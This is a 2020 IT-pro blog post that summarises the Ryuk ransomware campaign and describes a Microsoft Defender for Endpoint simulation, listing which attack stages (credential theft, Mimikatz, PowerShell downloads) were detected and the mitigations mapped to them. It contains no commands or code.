Hi IT Pros,
As you have known it, Ransomware is in the aggravated assault mode at this time of year 2020, the joint cybersecurity advisory comes from the Cybersecurity Infrastructure and Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have just given a serious warning about Ransomware Threat as shown in the following announcement:
Debut in August of 2018, the Ransomware Ryuk gained shocking attention in 2019, Ryuk gangs demanded multi-million-dollar ransoms from victims, among them are companies, hospitals, and local governments. The actors are able to pocket over $61 million just in the US alone, according to FBI's report.
Check Point, a security software vendor also noted that the gang was attacking on an average of 20 companies every week in the third quarter of 2020.
Sean Gallagher from Sophos Lab, gave us the story about a typical Ryuk and Conti Ransomeware attack.
Multiple instances of the malicious attachment were detected and blocked. But there was one employee who clicked on the link in the email that afternoon, allowing the outlook mail to execute "print_document.exe", a malicious executable file identified as Buer Loader.
By Wednesday morning the actors had obtained administrative credentials and had connected to the Domain Controller Server, where they performed a data dump of Active Directory records.
Data dump to an Admin User directory was most likely accomplished using "SharpHound".
SharpHound is the official data collector for BloodHound. It is written in C# and uses native Windows API functions and LDAP namespace functions to collect data from domain controllers
Ryuk ransomware was redeployed and re-launched three more times in short order after each failed attempt, no files were encrypted.
Lesson Learn
You may be worried and wonder how good the MD for Endpoint and MD for Identity could protect your systems from ransomware.
Well, let us bring MD to the test. The most trusted industry test could be AV-Test from the Independent IT-Security Institute in Magdeburg of Germany, who has been known as the owner of the largest malware database in the world, it has counted a total of 1121.95 millions of malware to date (11/27/2020). Every day, the AV-TEST Institute registers over 350,000 new malicious programs (malware) and potentially unwanted applications (PUA).
Test antivirus software for Windows 10 - October 2020 | AV-TEST (av-test.org)
In its Security Report for 2019, AV-Test Lab gave the following conclusion:
… the embedded Windows defense systems proved to be reliable protection against automated mass malware. In the regular certification tests over the past year (2018), Microsoft‘s consumer product, “Microsoft Defender Antivirus“ garnered the AV-TEST rating as “Top Product“ five out of six times. Which among other things was due to the reliable detection and defensive performance against widely distributed and frequently occurring malware. The business solution from Microsoft exhibited even better test results in 2019 and was even able to defend the title of “Top Product“ in six out of six annual tests.
Microsoft Defender for Endpoint Simulation Attack
Now, let us conduct our own test using the MD for Endpoint - Evaluation Lab feature:
with " known ransomware infection" attack simulation , the following ransomware names are detected and alerted on test machine1:
Click on WannaCrypt ransomware to show the details about malicious file named Llac.exe and how long it stayed before being quarantined (3 minutes and 15 seconds):
Click on Petya ransomware to show detail of malicious file named bdata.bin, it was existed within only 5 seconds and been quarantined:
The ransomware attack overview and its entities are shown in the incident named “Multi-stage incident involving Initial access & Discovery including Ransomware on multiple Endpoints” tree graph,
Ransomware Action
|
MD for Endpoint and MD for Identity Alert |
Malicious services were created on remote servers using the same admin credentials, using WMI Event to drop command payload. |
MD for Endpoint Alert: WMI suspicious Event
|
PowerShell is used to download more malicious payloads.
|
MD for Endpoint Alert
|
Credential theft activity |
MD for Identity Alert about overpass the hash attack:
|
Impersonate action on privilege account and privilege group membership by PowerShell script. |
Alert by MD for Identity and displayed in Cloud App Security Portal:
|
Keyboard hijack activity |
Alert by Defender for Endpoint:
|
Fileless attacks with memory payload. |
These activities could be detected by AMSI, Microsoft’s Anti-Malware Scanning Interface, when it inspects the in-memory process. MD for Endpoint raised the alert, details as follow:
|
Mimikatz was used as a credential theft tool, It was detected and blocked from installation. Mimikatz files were quarantined. |
Alert by MD for Endpoint
|
Backdoor activity detected |
Alerted by MD for Endpoint:
|
Ransomware Payload and encryption activities are prevented beforehand. |
There is no domain dominant - alert event. There is no encryption - alert event. |
Ryuk Ransomware Prevention and Protection strategy provided by MD for Endpoint - Threat Analytics.
Microsoft Defender for Endpoint Analytics proposed an analyst report and mitigation (plan) against the Ryuk ransomware. Each of the attack step in Ryuk’s killing chain is mapped to the protection measures which include Antivirus-EDR (MD for Endpoint), Azure ATP (MD for Identity), Multi Factors Authentication MFA, Attack Surface Reduction rules for Office Macro, Windows Host Firewall, and Tamper Protection Security Policy.
The detail of Ryuk attack based on MITRE ATT&CK process is shown in the following image, each Ransomware action step of the attack sequence was mapped to one or multiple counter attack measure:
Mitigations provided by MD for Endpoint - Threat Analytics
If Security Administrators enable EDR and all features of Defender, setup alert notification and completely finish all of the Defender Endpoint and Defender Identity’s remediation plans against each ransomware and malware, then, I guess, our colleagues may have a much better sleep at night, knowing that their systems are safe and well protected from ransomware and other malware threats.
To get it upto the "100%" level of protection, your defender strategy should always include Windows 10 Defender Guard (Application Guard, Credential Guard, Exploit Guard with Attack Surface Reduction rules, System Guard, …) together with MD for Endpoint, to be deployed on workstations and servers and MD for Identity applied to all domain controllers, it is part of the defense strategy and included in M365 E5 license. You may want to check the blog articles related to Microsoft Defender for Identity setup and operation.
I hope the info is useful,
Have a valuable time with your Defender!
___________________________________
Reference:
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.